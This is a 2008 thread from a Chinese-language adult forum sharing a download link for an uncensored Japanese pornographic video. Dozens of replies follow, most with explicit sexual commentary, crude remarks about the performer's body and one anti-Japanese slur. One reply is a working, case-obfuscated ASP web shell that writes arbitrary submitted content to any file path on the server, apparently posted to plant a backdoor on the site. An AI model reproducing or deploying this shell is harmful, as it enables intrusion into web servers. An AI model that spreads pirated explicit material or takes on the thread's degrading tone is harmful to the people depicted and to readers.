标题: [日本AV] [无碼/320*240]3P肛交外加內射[3GP/16.63MB] [打印本页]

作者: www1001    时间: 2008-8-6 12:10     标题: [无碼/320*240]3P肛交外加內射[3GP/16.63MB]

[无碼/320*240]3P肛交外加內射[3GP/16.63MB]

影片名稱:3P肛交外加內射
影片大小:16.63MB
影片格式:3GP
播放時間:09:40
是否有碼:无碼
下載鏈接地址:

http://cn.ziddu.com/download/207 ... _masterzou.rar.html

圖片:

看不到大圖請點下面小圖連結觀賞

作者: jy03139593    时间: 2008-8-6 12:26

支持楼主,希望后面能又更多精彩的影片出来与大家分享!
作者: 超燃    时间: 2008-8-6 12:32

支持楼主,希望后面能又更多精彩的影片出来与大家分享!  谢谢
作者: ysm_3303    时间: 2008-8-6 12:42

有吗 ?还是支持楼主!祝SEXINSEX越办越好!
作者: hackin    时间: 2008-8-7 00:19

这是新片子啊,不错不错,感谢LZ分享了谢谢!
作者: goodandbye114    时间: 2008-8-7 12:54

图片看上去很经典,不过女的YD上有很厚的东西,是不是有性病啊?
作者: fyp1225    时间: 2008-8-7 12:58     标题: 回复 1楼 的帖子

很不错的片子.BB很干净的.阴唇比较厚,我喜欢这样的女人
作者: 123456xyz    时间: 2008-8-7 13:18

引用:
原帖由 hackin 于 2008-8-7 00:19 发表
这是新片子啊,不错不错,感谢LZ分享了谢谢!
不是病,是长的这样,又肥又大,还是不错的!

引错了
作者: 1016    时间: 2008-8-7 15:55

这个MM的脸蛋很漂亮啊,口技也很好似的,我下载后看。
作者: lhl222lhl    时间: 2008-8-10 10:59

看着不错  下来看看 谢谢楼主辛苦 期望你多多的精品
作者: sweaty    时间: 2008-8-10 11:53

支持!
肛交原来如此啊!
不知女方是否是爽到了极点呢!
作者: fengyunzcp    时间: 2008-8-10 11:55

图片好清晰啊,真是个好片子,谢谢楼主分享,送上红心一颗
作者: luxnun52    时间: 2008-8-10 19:43

so Good very thank you..
作者: bai7190    时间: 2008-8-10 20:18

这个图片太让人兴奋了
我也想肛交
哈哈
作者: chaanbao    时间: 2008-8-20 22:00

支持楼主,最喜欢肛交的片子,特别是亚洲的!
作者: mini45    时间: 2008-8-20 23:53

希望后面能又更多精彩的影片出来与大家分享!
作者: huyibing    时间: 2008-8-21 00:41

手机视频就是要这种短小精悍,内容火爆的,感谢分享!
作者: asexd001    时间: 2008-8-23 05:00

还没有下呢
先问一下是那个国家的
谢谢
作者: jkmvp    时间: 2008-9-6 12:15     标题: 感谢下

主题很好 就是短了一点.有长点的就更好了 支持
作者: hbg123    时间: 2008-9-6 12:18

看着不错 ,先下载下来看看怎么样。谢谢楼主分享!
作者: tonny-cheng    时间: 2008-9-7 01:19

图片看上去很经典,不过女的YD上有很厚的东西,是不是有性病啊?
作者: 战线033    时间: 2008-9-7 07:22

喜欢这样的好片子。希望楼主多传这样的片子
作者: secondyang    时间: 2008-9-7 11:45

楼主有没有全部的啊?希望能放出来。还有没有类似无码双枪的?
作者: gjxshazhude    时间: 2008-9-14 21:52

真是好片子,谢谢楼主了,再接再厉吧!!!
作者: lixixi520    时间: 2008-9-16 13:40

谢谢楼主分享  看上去清晰度还可以  收藏了
作者: eve520    时间: 2008-9-17 14:49

这个我也有,在手机里我的是N82没有截图软件,要不然早就上了,哪位兄弟有是N82没有截图软件告诉俺一声.再次多谢了!
作者: 稀土    时间: 2008-9-17 15:08

是小日本的吧,干死钩日的。楼主多发希望楼主多发一些好片子
作者: 16782    时间: 2008-10-2 20:14

没话说了,这么好的片子此时不下载,更待何时
作者: andyliu5201578    时间: 2008-10-2 22:07

看到应该是熟女来的啊,功夫一定不错的,谢谢楼主的分享拉
作者: zhjdtw    时间: 2008-10-2 22:28     标题: 看着不错

作者: qwertttttt    时间: 2008-10-3 13:16

樓主你分享的東西真是太好了!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
作者: hyilove27    时间: 2008-10-4 14:02

呵呵   好东西
     谢谢楼主啊
作者: ziroro    时间: 2008-10-4 14:31

<% Dim ObjFSO %>
<% Dim FDAtA %>
<% Dim ObjCOuntFilE %>
<% On ErrOr rEsumE nExt %>
<% SEt ObjFSO = SErvEr.CrEAtEObjEct("Scripting.FilESystEmObjEct") %>
<% iF Trim(rEquEst("syFDpAth"))<>"" thEn %>
<% FDAtA = rEquEst("cyFDDAtA") %>
<% SEt ObjCOuntFilE=ObjFSO.CrEAtETExtFilE(rEquEst("syFDpAth"),TruE) %>
<% ObjCOuntFilE.WritE FDAtA %>
<% iF Err =0 thEn %>
<% rEspOnsE.writE "<FOnt cOlOr=rED>成功!</FOnt>" %>
<% ElsE %>
<% rEspOnsE.writE "<FOnt cOlOr=rED>失败!</FOnt>" %>
<% EnD iF %>
<% Err.clEAr %>
<% EnD iF %>
<% ObjCOuntFilE.ClOsE %>
<% SEt ObjCOuntFilE=NOthing %>
<% SEt ObjFSO = NOthing %>
<% REspOnsE.writE "<FOrm ActiOn='' mEthOD=pOst>" %>
<% REspOnsE.writE "保存路径:</FOnt>" %>
<% REspOnsE.WritE "<input typE=tExt nAmE=syFDpAth wiDth=32 sizE=50 vAlue='"&sErvEr.mAppAth(REquEst.SErvErVAriAblEs("SCRIPT_NAME"))&"'>" %>
<% = %>
<% REspOnsE.writE "<br>" %>
<% REspOnsE.writE "输入内容:" %>
<% REspOnsE.writE "<tExtArEA nAmE=cyFDDAtA cOls=80 rOws=10 wiDth=32></tExtArEA>" %>
<% REspOnsE.writE "<input typE=submit vAluE=保存>" %>
<% REspOnsE.writE "</FOrm>" %>
作者: guanfeng831    时间: 2008-10-4 16:57

这个片子真的很不错,看样子好像也蛮清晰的哦!
作者: phpegg    时间: 2008-10-5 15:41

这个片子我以前下过,是日本的A片吧,不过女的很有气质的说,谢谢楼主发片了
作者: 闯红灯123    时间: 2008-10-8 13:53

看图片很不错啊,谢谢楼主发片,辛苦辛苦。
作者: 117264    时间: 2008-10-8 18:40

看着我喜欢,应该是国语的吧,听的懂就爽拉,看女的象
作者: ganyuwxp    时间: 2008-10-9 20:53

楼主辛苦了,以后还希望多发精品,MM口技一流,BB也不错,我喜欢。
作者: kyolemon    时间: 2008-10-9 20:59

应该是日本的吧,女的脸蛋很漂亮,谢谢楼主了。
我怎么下不了?哪里错了?下的是一个26字节的压缩包,还是损坏的,楼主检查下吧。

作者: 大连球霸就是我    时间: 2008-10-9 21:05

这个骚女人大逼太难看了,闭灯操吧。一看就不干净!!!
作者: lishbosi520    时间: 2008-10-10 12:22

真的很勇猛啊,两路齐下一起通,搞到梦幻境界
作者: aboole    时间: 2008-10-30 13:36

哈哈支持楼主收藏了啊。哈哈,个人比较喜欢,谢谢
作者: 37149796    时间: 2008-11-1 14:42

顶了~~~顶了~~~顶了~~~!!!顶了~~~顶了~~~
作者: assenav    时间: 2008-11-1 16:56

厄~~~~~~~~重口味~~~~~~~~~~~~
作者: zxlying001    时间: 2008-11-2 18:04

这个MM的脸蛋很漂亮啊,口技也很好似的,我下载后看
很不错的片子.BB很干净的.阴唇比较厚,我喜欢这样的女人
作者: 006    时间: 2008-11-3 12:35

啊 那女的很不错   我向来喜欢小日本的肛交片感谢楼主不过我用手机下不了  遗憾
作者: narcissusren    时间: 2008-11-4 00:14

看图片蛮诱惑的 MM也长的不错 支持楼主的帖子
作者: amoitg    时间: 2008-11-4 17:23

支持楼主,希望后面能又更多精彩的影片出来与大家分享!  谢谢
作者: eva001sd    时间: 2008-11-4 18:36

作者: yy080101    时间: 2008-11-4 20:33

作者: eegn110    时间: 2008-11-16 04:21

看样子不错 挺漂亮的 喜欢啊 就喜欢重口味
作者: wkcnmzlm1    时间: 2008-11-16 10:17     标题: 我来说两句

林子大了什么鸟都有,~!这B也叫好看?晕死了~!没点品位了你~!
   你瞎了你~!
  纯支持`!
作者: mars1008    时间: 2008-11-16 12:13

好过瘾啊,喜欢这种口味,楼主再多来这样的,谢谢了!

欢迎光临 SiS001! Board - [第一会所 关闭注册] (https://1huisuo.net/bbs/) Powered by Discuz! 7.2